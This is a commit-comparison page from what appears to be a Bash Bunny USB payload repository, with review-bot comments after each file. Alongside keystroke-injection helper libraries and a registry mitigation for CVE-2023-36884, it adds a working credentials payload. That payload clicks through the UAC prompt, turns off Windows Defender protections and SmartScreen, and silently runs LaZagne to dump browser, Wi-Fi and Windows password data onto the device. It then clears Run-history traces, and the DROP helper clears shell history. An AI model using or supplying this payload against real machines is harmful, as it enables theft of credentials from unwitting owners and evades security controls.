Compare commits
31 Commits
8b35d04ee5
...
f4513c02ed
Author | SHA1 | Date |
---|---|---|
Aleff | f4513c02ed | |
Peaks | 9bc2a0312d | |
Rafa Guillermo | f7cf46fd95 | |
Rafa Guillermo | 774cc77212 | |
Rafa Guillermo | 5da19abe97 | |
Rafa Guillermo | b1cf7e8ef4 | |
Rafa Guillermo | 9bcb7f9240 | |
Rafa Guillermo | bf149a783b | |
Rafa Guillermo | bc36c76444 | |
Rafa Guillermo | 6a260cfd4b | |
Peaks | 8d901a02a8 | |
Peaks | 14fa7c490e | |
Peaks | 2559d728b1 | |
Aleff | 47cf3bde11 | |
Aleff | 9b9dfe8045 | |
Aleff | 617aa0a25f | |
Aleff | 55242ea4cf | |
Aleff | 87354048c8 | |
aleff-github | ac02af58f4 | |
aleff-github | 0adde48233 | |
Aleff | d6bae24975 | |
TheDragonkeeper | 963c000ab9 | |
bg-wa | a479964196 | |
bg-wa | 17e0b3d50c | |
bg-wa | 5f06649cd2 | |
bg-wa | 9ab8820cc5 | |
bg-wa | b3b9f75200 | |
bg-wa | 5c764849f3 | |
bg-wa | afdafb27d6 | |
bg-wa | 821105a6a3 | |
bg-wa | 31ae33e78a |
|
@ -0,0 +1,103 @@
|
||||||
|
#!/bin/bash
|
||||||
|
#
|
||||||
|
# DROP v1 by bg-wa
|
||||||
|
# Simplifies dropping files from HID attacks for LINUX
|
||||||
|
# Usage: DROP [OS] bb_source_file.txt attack_destination_file.txt [overwrite: false] [executable: false]
|
||||||
|
#
|
||||||
|
# Example:
|
||||||
|
# DROP UNITY /root/udisk/payloads/$SWITCH_POSITION/source.sh ~/target_destination.sh true true
|
||||||
|
source ./run.sh
|
||||||
|
|
||||||
|
function DROP() {
|
||||||
|
os=$1
|
||||||
|
source=$2
|
||||||
|
destination=$3
|
||||||
|
overwrite=$4
|
||||||
|
executable=$5
|
||||||
|
|
||||||
|
case "$os" in
|
||||||
|
WIN)
|
||||||
|
RUN WIN powershell
|
||||||
|
;;
|
||||||
|
OSX)
|
||||||
|
RUN OSX terminal
|
||||||
|
;;
|
||||||
|
UNITY)
|
||||||
|
RUN UNITY terminal
|
||||||
|
;;
|
||||||
|
LINUX)
|
||||||
|
RUN LINUX terminal
|
||||||
|
;;
|
||||||
|
*)
|
||||||
|
RUN UNITY terminal
|
||||||
|
;;
|
||||||
|
esac
|
||||||
|
|
||||||
|
QUACK DELAY 1000
|
||||||
|
|
||||||
|
if "$overwrite" == "true"
|
||||||
|
then
|
||||||
|
case "$os" in
|
||||||
|
WIN)
|
||||||
|
QUACK STRING del "$destination"
|
||||||
|
;;
|
||||||
|
*)
|
||||||
|
QUACK STRING rm "$destination"
|
||||||
|
;;
|
||||||
|
esac
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
fi
|
||||||
|
|
||||||
|
case "$os" in
|
||||||
|
WIN)
|
||||||
|
QUACK STRING fsutil file createnew "$destination"
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING notepad.exe "$destination"
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 1000
|
||||||
|
;;
|
||||||
|
*)
|
||||||
|
QUACK STRING vi "$destination"
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING i
|
||||||
|
;;
|
||||||
|
esac
|
||||||
|
|
||||||
|
while IFS= read -r data
|
||||||
|
do
|
||||||
|
QUACK STRING "$data"
|
||||||
|
QUACK ENTER
|
||||||
|
done < "$source"
|
||||||
|
|
||||||
|
QUACK DELAY 500
|
||||||
|
|
||||||
|
case "$os" in
|
||||||
|
WIN)
|
||||||
|
QUACK CTRL s
|
||||||
|
QUACK CRTL x
|
||||||
|
;;
|
||||||
|
*)
|
||||||
|
QUACK ESC
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK STRING :wq
|
||||||
|
QUACK ENTER
|
||||||
|
|
||||||
|
if "$executable" == "true"
|
||||||
|
then
|
||||||
|
QUACK STRING chmod +x "$destination"
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
fi
|
||||||
|
|
||||||
|
QUACK STRING history -c
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK STRING exit
|
||||||
|
QUACK ENTER
|
||||||
|
;;
|
||||||
|
esac
|
||||||
|
}
|
||||||
|
|
||||||
|
export -f DROP
|
|
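Review bot: The overwrite and executable checks, `if "$overwrite" == "true"` and `if "$executable" == "true"`, are not test expressions: bash runs the variable's value as a command with `==` and `true` as its arguments, which only happens to work because `true` and `false` ignore their arguments, while any other value (including the empty default the usage line promises) gives a command-not-found on the Bunny side and a silently skipped branch. Both should read `if [ "$overwrite" = "true" ]` and `if [ "$executable" = "true" ]`. The usage comment also requires an OS as the first argument, yet the Drop'n'Run payload later on this page calls `DROP $source_script $target_script true true` with no OS, which shifts every argument by one; either the usage line or that caller is wrong, and a short comment stating that the OS argument is mandatory would settle it.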
@ -0,0 +1,126 @@
|
||||||
|
#!/bin/bash
|
||||||
|
|
||||||
|
################################################################################
|
||||||
|
# Quickly get to a prompt on any platform with the BashBunny
|
||||||
|
#
|
||||||
|
# How this works?
|
||||||
|
# 1) Once the library is included in your payload, launch terminal\powershell\run
|
||||||
|
# with:
|
||||||
|
# PROMPT [OS]
|
||||||
|
# 2) OS options are:
|
||||||
|
# "AUTO" : Default - Hak5 2124 cross platform code
|
||||||
|
# "UNITY" : Launches Terminal in Unity
|
||||||
|
# "UNITY_RUN" : Opens run prompt in Unity
|
||||||
|
# "MAC" : Launches Terminal in OSX
|
||||||
|
# "POWERSHELL" : Launches Powershell in Windows
|
||||||
|
# "WINDOWS_RUN": Opens run prompt in Windows
|
||||||
|
# 3) To close a prompt use:
|
||||||
|
# CLOSE_PROMPT [OS]
|
||||||
|
################################################################################
|
||||||
|
|
||||||
|
################################################################################
|
||||||
|
# Start HID Prompt
|
||||||
|
################################################################################
|
||||||
|
|
||||||
|
|
||||||
|
function PROMPT() {
|
||||||
|
if [ -z "$1" ]; then
|
||||||
|
OS="AUTO"
|
||||||
|
else
|
||||||
|
OS=$1
|
||||||
|
fi
|
||||||
|
|
||||||
|
#AUTO
|
||||||
|
if [ "${OS}" = "AUTO" ]; then
|
||||||
|
LED G B 100
|
||||||
|
QUACK ALT F2
|
||||||
|
QUACK DELAY 50
|
||||||
|
QUACK GUI SPACE
|
||||||
|
QUACK DELAY 50
|
||||||
|
QUACK GUI r
|
||||||
|
clear_active_input
|
||||||
|
wait_enter_wait 200 1000
|
||||||
|
fi
|
||||||
|
|
||||||
|
#UNITY
|
||||||
|
if [ "${OS}" = "UNITY" ]; then
|
||||||
|
LED R B 100
|
||||||
|
QUACK GUI
|
||||||
|
clear_active_input
|
||||||
|
QUACK STRING terminal
|
||||||
|
wait_enter_wait 200 1000
|
||||||
|
fi
|
||||||
|
|
||||||
|
#UNITY_RUN
|
||||||
|
if [ "${OS}" = "UNITY_RUN" ]; then
|
||||||
|
LED R B 100
|
||||||
|
QUACK ALT F2
|
||||||
|
fi
|
||||||
|
|
||||||
|
#MAC
|
||||||
|
if [ "${OS}" = "MAC" ]; then
|
||||||
|
LED R B G 100
|
||||||
|
QUACK GUI SPACE
|
||||||
|
clear_active_input
|
||||||
|
QUACK STRING terminal
|
||||||
|
wait_enter_wait 200 1000
|
||||||
|
fi
|
||||||
|
|
||||||
|
#POWERSHELL
|
||||||
|
if [ "${OS}" = "POWERSHELL" ]; then
|
||||||
|
LED B 100
|
||||||
|
QUACK GUI
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK powershell
|
||||||
|
wait_enter_wait 200 1000
|
||||||
|
fi
|
||||||
|
|
||||||
|
#WINDOWS_RUN
|
||||||
|
if [ "${OS}" = "WINDOWS_RUN" ]; then
|
||||||
|
LED B 100
|
||||||
|
QUACK GUI r
|
||||||
|
QUACK DELAY 500
|
||||||
|
fi
|
||||||
|
|
||||||
|
LED 0
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
function CLOSE_PROMPT() {
|
||||||
|
if [ -z "$1" ]; then
|
||||||
|
QUACK ALT F4
|
||||||
|
else
|
||||||
|
if [ "$1" = "MAC" ]; then
|
||||||
|
QUACK GUI w
|
||||||
|
else
|
||||||
|
QUACK ALT F4
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
# HELPER FUNCTIONS
|
||||||
|
function wait_enter_wait() {
|
||||||
|
if [ -z "$1" ]; then
|
||||||
|
BEFORE_WAIT=100
|
||||||
|
else
|
||||||
|
BEFORE_WAIT=$1
|
||||||
|
fi
|
||||||
|
if [ -z "$2" ]; then
|
||||||
|
AFTER_WAIT=100
|
||||||
|
else
|
||||||
|
AFTER_WAIT=$2
|
||||||
|
fi
|
||||||
|
|
||||||
|
QUACK DELAY ${BEFORE_WAIT}
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY ${AFTER_WAIT}
|
||||||
|
}
|
||||||
|
|
||||||
|
function clear_active_input() {
|
||||||
|
QUACK DELAY 50
|
||||||
|
QUACK BACKSPACE
|
||||||
|
QUACK DELAY 100
|
||||||
|
}
|
||||||
|
|
||||||
|
export -f PROMPT
|
||||||
|
export -f CLOSE_PROMPT
|
|
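Review bot: `OS`, `BEFORE_WAIT` and `AFTER_WAIT` are assigned without `local` inside `PROMPT` and `wait_enter_wait`, so each call overwrites global shell variables of the same name in whatever payload sources this library; declare them `local OS`, `local BEFORE_WAIT` and `local AFTER_WAIT` at the top of their functions. The OS identifiers accepted here (`MAC`, `POWERSHELL`, `WINDOWS_RUN`) also differ from the set the DROP library earlier on this page uses (`WIN`, `OSX`, `UNITY`, `LINUX`), so a payload using both libraries has to remember two vocabularies; the header comment should at least say that these names are specific to PROMPT. The `Hak5 2124` reference in the `AUTO` description would help a reader more if the comment named what it refers to.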
@ -0,0 +1,118 @@
|
||||||
|
# Defend yourself against CVE-2023-36884 Office and Windows HTML Remote Code Execution Vulnerability
|
||||||
|
|
||||||
|
This script allows you to set the Register Key block rule that will allow you to defend against CVE-2023-36884.
|
||||||
|
|
||||||
|
**Category**: Incident Response
|
||||||
|
|
||||||
|
## Table of Contents
|
||||||
|
|
||||||
|
- [Payload Description](#payload-description)
|
||||||
|
- [CVE-2023-36884 Description](#cve-2023-36884-description)
|
||||||
|
- [Summary](#summary)
|
||||||
|
- [Note](#note)
|
||||||
|
- [Dependencies](#dependencies)
|
||||||
|
- [Settings](#settings)
|
||||||
|
- [Administrative Privileges](#administrative-privileges)
|
||||||
|
- [Set the rule](#set-the-rule)
|
||||||
|
- [See the new rule](#see-the-new-rule)
|
||||||
|
- [Remove the rule](#remove-the-rule)
|
||||||
|
- [Credits](#credits)
|
||||||
|
|
||||||
|
## Payload Description
|
||||||
|
|
||||||
|
This script allows you to set the Register Key block rule that will allow you to defend against CVE-2023-36884.
|
||||||
|
|
||||||
|
Open a PowerShell, set the Register Key block rule trough the [command line interface](https://learn.microsoft.com/en-us/powershell/scripting/samples/working-with-registry-keys?view=powershell-7.3).
|
||||||
|
|
||||||
|
|
||||||
|
![](https://i.ibb.co/g7Tj3fV/2.png)
|
||||||
|
|
||||||
|
## CVE-2023-36884 Description
|
||||||
|
|
||||||
|
### Summary
|
||||||
|
|
||||||
|
Microsoft is investigating reports of a series of remote code execution vulnerabilities impacting Windows and Office products. Microsoft is aware of targeted attacks that attempt to exploit these vulnerabilities by using specially-crafted Microsoft Office documents.
|
||||||
|
|
||||||
|
An attacker could create a specially crafted Microsoft Office document that enables them to perform remote code execution in the context of the victim. However, an attacker would have to convince the victim to open the malicious file.
|
||||||
|
|
||||||
|
Upon completion of this investigation, Microsoft will take the appropriate action to help protect our customers. This might include providing a security update through our monthly release process or providing an out-of-cycle security update, depending on customer needs.
|
||||||
|
|
||||||
|
Please see the Microsoft Threat Intelligence [Blog Entry](https://www.microsoft.com/en-us/security/blog/2023/07/11/storm-0978-attacks-reveal-financial-and-espionage-motives/) for important information about steps you can take to protect your system from this vulnerability.
|
||||||
|
|
||||||
|
This CVE will be updated with new information and links to security updates when they become available. If you wish to be notified when these updates are released, we recommend that you register for the security notifications mailer to be alerted of content changes to this CVE. See [Microsoft Technical Security Notifications](https://www.microsoft.com/en-us/msrc/technical-security-notifications?rtc=1) and [Security Update Guide Notification System News: Create your profile now – Microsoft Security Response Center](https://msrc.microsoft.com/blog/2022/08/security-update-guide-notification-system-news-create-your-profile-now/).
|
||||||
|
|
||||||
|
Source: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36884
|
||||||
|
|
||||||
|
### Note
|
||||||
|
|
||||||
|
Tested on:
|
||||||
|
- Windows 11 Eng
|
||||||
|
|
||||||
|
### Dependencies
|
||||||
|
|
||||||
|
* ExecutionPolicy Bypass
|
||||||
|
|
||||||
|
## Settings
|
||||||
|
|
||||||
|
In this payload, I created a new registry key called "FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION." All of the following application names are then added as a value of type REG_DWORD with data 1.
|
||||||
|
|
||||||
|
- Excel.exe
|
||||||
|
- Graph.exe
|
||||||
|
- MSAccess.exe
|
||||||
|
- MSPub.exe
|
||||||
|
- Powerpnt.exe
|
||||||
|
- Visio.exe
|
||||||
|
- WinProj.exe
|
||||||
|
- WinWord.exe
|
||||||
|
- Wordpad.exe
|
||||||
|
|
||||||
|
Remember that you must run PowerShell with administrative privileges to create and manage registry keys.
|
||||||
|
|
||||||
|
### Administrative Privileges
|
||||||
|
|
||||||
|
- I used the Payload [Starting a PowerShell with administrator permissions in Windows 10/11](https://github.com/hak5/usbrubberducky-payloads/tree/master/payloads/library/execution/Starting_a_PowerShell_with_administrator_permissions_in_Windows) by Hak5 Payloads
|
||||||
|
|
||||||
|
```
|
||||||
|
DELAY 1000
|
||||||
|
GUI x
|
||||||
|
DELAY 500
|
||||||
|
STRING a
|
||||||
|
DELAY 500
|
||||||
|
LEFT_ARROW
|
||||||
|
DELAY 500
|
||||||
|
ENTER
|
||||||
|
```
|
||||||
|
|
||||||
|
### Set the rule
|
||||||
|
|
||||||
|
![](https://i.ibb.co/XZB8NDJ/1.png)
|
||||||
|
|
||||||
|
### See the new rule
|
||||||
|
|
||||||
|
![](https://i.ibb.co/g7Tj3fV/2.png)
|
||||||
|
|
||||||
|
### Remove the rule
|
||||||
|
|
||||||
|
![](https://i.ibb.co/jRLj8j3/3.png)
|
||||||
|
|
||||||
|
## Credits
|
||||||
|
|
||||||
|
<h2 align="center">Aleff</h2>
|
||||||
|
<div align=center>
|
||||||
|
<table>
|
||||||
|
<tr>
|
||||||
|
<td align="center" width="96">
|
||||||
|
<a href="https://github.com/aleff-github">
|
||||||
|
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||||
|
</a>
|
||||||
|
<br>Github
|
||||||
|
</td>
|
||||||
|
<td align="center" width="96">
|
||||||
|
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||||
|
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||||
|
</a>
|
||||||
|
<br>Linkedin
|
||||||
|
</td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
</div>
|
|
@ -0,0 +1,106 @@
|
||||||
|
#######################################################################################################################
|
||||||
|
# #
|
||||||
|
# Title : Defend yourself against CVE-2023-36884 Office and Windows HTML Remote Code Execution Vulnerability #
|
||||||
|
# Author : Aleff #
|
||||||
|
# Version : 1.0 #
|
||||||
|
# Category : Incident Response #
|
||||||
|
# Target : Windows 10/11 #
|
||||||
|
# #
|
||||||
|
#######################################################################################################################
|
||||||
|
|
||||||
|
ATTACKMODE HID
|
||||||
|
|
||||||
|
# PlugAndPlay <3
|
||||||
|
|
||||||
|
# Requirements:
|
||||||
|
# - ExecutionPolicy Bypass
|
||||||
|
|
||||||
|
# Impact: Remote Code Execution
|
||||||
|
# Max Severity: Important
|
||||||
|
|
||||||
|
# Mitigation:
|
||||||
|
# - Customers who use Microsoft Defender for Office are protected from attachments that attempt to exploit this vulnerability.
|
||||||
|
# - The registry key FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION is located in the Main folder under the Internet Explorer settings, within the path HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\FeatureControl. This registry key is used to mitigate the vulnerability known as 'Office and Windows HTML Remote Code Execution Vulnerability' (CVE-2023-36884).
|
||||||
|
# The CVE-2023-36884 vulnerability allows remote code execution through the processing of HTML files by Office and Windows applications. Creating this registry key and adding specific application values, such as REG_DWORD with data 1, helps block cross-protocol file navigation to mitigate the exploitation of this vulnerability.
|
||||||
|
|
||||||
|
# It is recommended to implement these protective measures to prevent potential attacks that could exploit the vulnerability and compromise the security of Office and Windows systems. It is important to understand the implications of modifying the registry and carefully evaluate the impact on the regular functionality of the involved applications.
|
||||||
|
|
||||||
|
# Source: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36884
|
||||||
|
|
||||||
|
QUACK DELAY 1000
|
||||||
|
QUACK GUI x
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING a
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK LEFTARROW
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
|
||||||
|
# Sets the path to the registry key
|
||||||
|
QUACK STRING \$registryPath = 'HKLM:\SOFTWARE\Policies\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION'
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
|
||||||
|
# Array of application names
|
||||||
|
QUACK STRING \$applicationNames = @(
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING 'Excel.exe',
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING 'Graph.exe',
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING 'MSAccess.exe',
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING 'MSPub.exe',
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING 'Powerpnt.exe',
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING 'Visio.exe',
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING 'WinProj.exe',
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING 'WinWord.exe',
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING 'Wordpad.exe'
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING )
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
|
||||||
|
# Create the registry key if it does not already exist
|
||||||
|
QUACK STRING if (!(Test-Path \$registryPath)) {
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING New-Item -Path \$registryPath -Force # Out-Null
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING echo 'Registry key created'
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING }
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
|
||||||
|
# Add the values to the registry key
|
||||||
|
QUACK STRING foreach (\$appName in \$applicationNames) {
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING Set-ItemProperty -Path \$registryPath -Name \$appName -Value 1 -Type DWORD -Force # Out-Null
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING echo '[+] \$appName'
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING }
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
|
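Review bot: The header comment gives the mitigation key as `HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\FeatureControl`, while the script actually writes `HKLM:\SOFTWARE\Policies\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION`; the comment should carry the same path (with `\Main\`) as the `$registryPath` line so that someone verifying the mitigation on the host looks at the key that was created. In the foreach block, `echo '[+] \$appName'` is single-quoted, so PowerShell prints the literal text `[+] $appName` instead of the application name; `QUACK STRING echo \"[+] \$appName\"` prints what was intended. The trailing `# Out-Null` on the `New-Item` and `Set-ItemProperty` lines is typed as a PowerShell comment and does nothing; either pipe to `| Out-Null` or drop it. A closing `QUACK STRING Get-ItemProperty \$registryPath` would let the operator confirm all nine values were written before closing the window.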
@ -0,0 +1,6 @@
|
||||||
|
$drivelabel = 'BashBunny'
|
||||||
|
$dest = ((Get-WmiObject win32_volume -f 'label=''$drivelabel''').Name+'loot\PasswordGrabber')
|
||||||
|
$filter = 'password_'+ $env:COMPUTERNAME
|
||||||
|
$filecount = ((Get-ChildItem -filter ($filter + "*") -path $dest | Measure-Object | Select -ExpandProperty Count) + 1)
|
||||||
|
Start-Process -WindowStyle Hidden -FilePath ((Get-WmiObject win32_volume -f 'label=''$drivelabel''').Name+'tooling\LaZagne.exe') -ArgumentList 'all -vv' -RedirectStandardOutput ($dest +'\' + $filter +'_' + $filecount +'.txt')
|
||||||
|
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue
|
|
@ -0,0 +1,90 @@
|
||||||
|
#!/bin/bash
|
||||||
|
#
|
||||||
|
# Title: Disable Windows Defender and Exfil stored passwords
|
||||||
|
# Description: Grabs password from all sort of things: chrome, internet explorer, firefox, filezilla and more...
|
||||||
|
# This payload is quick and silent and takes about 3 seconds after the Bash Bunny have started to quack.
|
||||||
|
# This payload makes use of AleZssandroZ awesome LaZagne password recovery tool as well as the Password Grabber by jdebetaz.
|
||||||
|
# Author: rafa-guillermo
|
||||||
|
# Props: Hak5Darren, AlessandroZ, TeCHemically, dragmus13, RazerBlade, jdebetaz
|
||||||
|
# Version: 1.2
|
||||||
|
# Category: Credentials
|
||||||
|
# Target: Windows
|
||||||
|
# Tested On: Windows 11
|
||||||
|
# Attackmodes: HID, STORAGE
|
||||||
|
|
||||||
|
# Options
|
||||||
|
LOOTDIR=/root/udisk/loot/PasswordGrabber
|
||||||
|
|
||||||
|
######## Set-up ########
|
||||||
|
LED SETUP
|
||||||
|
GET SWITCH_POSITION
|
||||||
|
ATTACKMODE HID STORAGE
|
||||||
|
DRIVE_LABEL=BashBunny
|
||||||
|
|
||||||
|
######## Make Loot Dir ########
|
||||||
|
# Setup named logs in loot directory
|
||||||
|
mkdir -p $LOOTDIR
|
||||||
|
|
||||||
|
####### Open a powershell window with elevated privileges #######
|
||||||
|
LED STAGE1
|
||||||
|
RUN WIN "powershell -Command \"Start-Process powershell -Verb RunAs\""
|
||||||
|
sleep 3 # wait for UAC prompt
|
||||||
|
QUACK ALT y
|
||||||
|
sleep 2
|
||||||
|
|
||||||
|
# Disable Windows Defender File Scan and and Real Time Protection
|
||||||
|
QUACK STRING Set-ItemProperty -Path HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer -Name SmartScreenEnabled -Value Off -Force
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK STRING Set-ItemProperty -Path HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer -Name SmartScreenEnabled -Value Off -Force
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK STRING Set-ItemProperty -Path HKCU:\\Software\\Microsoft\\Edge -Name SmartScreenEnabled -Value Off -Force
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK STRING Set-MpPreference -DisableRealtimeMonitoring \$true
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK STRING Set-MpPreference -DisableIOAVProtection \$true
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK STRING Set-MpPreference -DisableBehaviorMonitoring \$true
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK STRING Set-MpPreference -DisableScriptScanning \$true
|
||||||
|
QUACK ENTER
|
||||||
|
sleep 1
|
||||||
|
|
||||||
|
# Run laZagne
|
||||||
|
LED STAGE2
|
||||||
|
QUACK STRING "\$bashBunnyDrive = (Get-WmiObject -Query \"SELECT * FROM Win32_Volume WHERE Label='$DRIVE_LABEL'\" | Select-Object -ExpandProperty DriveLetter)"
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK STRING "\$scriptPath = \"\$bashBunnyDrive\\payloads\\$SWITCH_POSITION\\\payload.ps1\""
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK STRING \& \$scriptPath
|
||||||
|
QUACK ENTER
|
||||||
|
sleep 10
|
||||||
|
QUACK STRING exit
|
||||||
|
QUACK ENTER
|
||||||
|
|
||||||
|
|
||||||
|
# Re-enable Defender and Smart screen
|
||||||
|
LED CLEANUP
|
||||||
|
RUN WIN "powershell -Command \"Start-Process powershell -Verb RunAs\""
|
||||||
|
sleep 3 # wait for UAC prompt
|
||||||
|
QUACK ALT y
|
||||||
|
sleep 2
|
||||||
|
QUACK STRING Set-ItemProperty -Path HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer -Name SmartScreenEnabled -Value On -Force
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK STRING Set-ItemProperty -Path HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer -Name SmartScreenEnabled -Value On -Force
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK STRING Set-ItemProperty -Path HKCU:\\Software\\Microsoft\\Edge -Name SmartScreenEnabled -Value On -Force
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK STRING Set-MpPreference -DisableRealtimeMonitoring \$false
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK STRING Set-MpPreference -DisableIOAVProtection \$false
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK STRING Set-MpPreference -DisableBehaviorMonitoring \$false
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK STRING Set-MpPreference -DisableScriptScanning \$false
|
||||||
|
QUACK ENTER
|
||||||
|
sleep 1
|
||||||
|
QUACK STRING exit
|
||||||
|
QUACK ENTER
|
||||||
|
|
||||||
|
######## FINISH ########
|
||||||
|
LED FINISH
|
|
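Review bot: The header says `# Version: 1.2` while the README for the same payload later on this page says `Version: 1.0`, and `AleZssandroZ` in the description line is spelled differently from `AlessandroZ` in the Props line; the two files should agree on both. The README also directs readers to "line 22 of payload.txt" for `DRIVE_LABEL`, which is correct today but drifts as soon as the header grows; a comment such as `# Drive label: keep in sync with $drivelabel in payload.ps1` next to `DRIVE_LABEL=BashBunny` is a more durable pointer than a line number.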
@ -0,0 +1,39 @@
|
||||||
|
# NoDefenseAgainstLaZagne
|
||||||
|
|
||||||
|
* Author: [rafa-guillermo](https://github.com/rafa-guillermo)
|
||||||
|
* Creds: [Hak5Darren](https://github.com/hak5darren), [AlessandroZ](https://github.com/AlessandroZ), TeCHemically, dragmus13, RazerBlade, jdebetaz
|
||||||
|
* Version: 1.0
|
||||||
|
* Frimware support: 1.1 and higher
|
||||||
|
* Target version: Windows 11
|
||||||
|
* Tested on: Windows 11
|
||||||
|
|
||||||
|
## Description
|
||||||
|
Disables Windows defender and runs LaZagne to grab passwords from the host system from apps like: chrome, internet explorer, firefox, filezilla and more. Wifi passwords and Win password hashes included. This payload is quick, but opens up an ugly PS terminal which can probably be obfuscated. This payload springboards off of AleZssandroZ's LaZagne password recovery tool as well as the Password Grabber by jdebetaz.
|
||||||
|
|
||||||
|
Full read here: [LaZagne Repository](https://github.com/AlessandroZ/LaZagne)
|
||||||
|
Password grabber: [Also in this repo](https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/credentials/PasswordGrabber)
|
||||||
|
|
||||||
|
## Configuration
|
||||||
|
1. You need to download LaZagne from the [LaZagne release page](https://github.com/AlessandroZ/LaZagne/releases). Tested with LaZagne 2.2 but might work with newer versions too.
|
||||||
|
2. Unzip the exe file and place it in the folder called 'tooling' on the root of the Bash Bunny. The payload folder should contain payload.ps1 and payload.txt, LaZagne.exe needs to be in a folder called tooling.
|
||||||
|
3. Set up your Bash Bunny Drive Label (default is BashBunny, config is on line 22 of payload.txt and line 1 of payload.ps1)
|
||||||
|
4. Plug your BashBunny and Enjoy
|
||||||
|
|
||||||
|
|
||||||
|
## Info
|
||||||
|
rafa-guillermo: I've added a whole bunch of stuff to disable Windows Defender file scanner, smart screen and RTP before running LaZagne, I was having issues where otherwise it would immediately be quarantined. Defender will be enabled again after execution.
|
||||||
|
|
||||||
|
jdebetaz: I remake this playload with the Payload Best Practice / Style Guide
|
||||||
|
|
||||||
|
RazerBlade: By default the payload is identical to the Payload [usb_exfiltrator] but adds some commands to execute LaZagne and save the passwords to the loot folder.
|
||||||
|
|
||||||
|
## Disclaimer
|
||||||
|
__Hak5 and playload's contributors are not responsible for the execution of 3rd party binaries.__
|
||||||
|
|
||||||
|
## Led status
|
||||||
|
|
||||||
|
| LED | Status |
|
||||||
|
|-----------------------------------------------|--------|
|
||||||
|
| Magenta solid | Setup |
|
||||||
|
| Yellow single blink | Attack |
|
||||||
|
| Green 1000ms VERYFAST blink followed by SOLID | Finish |
|
